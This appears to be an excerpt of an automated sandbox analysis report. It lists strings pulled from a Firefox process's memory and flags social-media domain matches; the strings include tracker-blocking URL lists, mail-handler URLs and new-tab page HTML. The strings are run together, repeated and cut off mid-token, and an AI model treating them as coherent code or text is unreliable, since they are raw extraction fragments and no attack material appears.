Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://ssl.google-analytics.com/ga.jsFileUtils_closeAtomicFileOutputStream*://s0.2mdn.net/instream/html5/ima3.js*://libs.coremetrics.com/eluminate.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/all.js*https://smartblock.firefox.etp/facebook.svg*://track.adform.net/serving/scripts/trackpoint/*://www.everestjs.net/static/st.v3.js*pictureinpicture%40mozilla.org:1.0.0webcompat-reporter%40mozilla.org:1.5.1*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/FileUtils.sys.mjshttps://smartblock.firefox.etp/play.svg*://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://c.amazon-adsystem.com/aax2/apstag.jsresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpi*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat_video.js@mozilla.org/addons/addon-manager-startup;1*://*.imgur.com/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://cdn.branch.io/branch-latest.min.js**://connect.facebook.net/*/sdk.js**://www.googletagmanager.com/gtm.js**://*.imgur.io/js/vendor.*.bundle.js*://www.google-analytics.com/plugins/ua/ec.jsFileUtils_closeSafeFileOutputStream*://www.google-analytics.com/gtm/js**://www.google-analytics.com/analytics.js*blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3624693263.000001C23CCF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/uriloader/handler-service;1@mozilla.org/dom/slow-script-debug;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.debugger.remote-websocketreleaseDistinctSystemPrincipalLoaderdevtools.performance.recording.ui-base-urlDevToolsStartup.jsm:handleDebuggerFlagdevtools/client/framework/devtoolsresource://devtools/server/devtools-server.jsdevtools/client/framework/devtools-browserdevtools-commandkey-javascript-tracing-toggleand deploy previews URLs are allowed.resource://devtools/shared/security/socket.jsdevtools.performance.popup.feature-flagdevtools.debugger.features.javascript-tracingDevTools telemetry entry point failed: JSON Viewer's onSave failed in startPersistencebrowser and that URL. Falling back to Unable to start devtools server on Failed to listen. Listener already attached.devtools-commandkey-profiler-capture{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.Got invalid request to save JSON dataWebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=filedevtools-commandkey-profiler-start-stopFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=default@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}http://www.inbox.lv/rfc2368/?value=%s^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?handlerSvc fillHandlerInfo: don't know this typehttp://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/web-handler-app;1get FIXUP_FLAGS_MAKE_ALTERNATE_URI^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_FORCE_ALTERNATE_URIScheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedhttps://mail.yahoo.co.jp/compose/?To=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}https://e.mail.ru/cgi-bin/sentmsg?mailto=%sgecko.handlerService.defaultHandlersVersionextractScheme/fixupChangedProtocol<@mozilla.org/uriloader/dbus-handler-app;1_injectDefaultProtocolHandlersIfNeededhttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1Must have a source and a callback@mozilla.org/network/simple-stream-listener;1resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified_finalizeInternal/this._finalizePromise<resource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238554000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238554000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: addons-search-detection@mozilla.com*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://trends.google.com/trends/embed*resource://builtin-addons/search-detection/addons-search-detection%40mozilla.com:2.0.0*://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/Serving/*https://en.wikipedia.org/wiki/Special:Search**://*.adsafeprotected.com/jload?*{3f78ada1-cba2-442a-82dd-d5fb300ddea7} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" 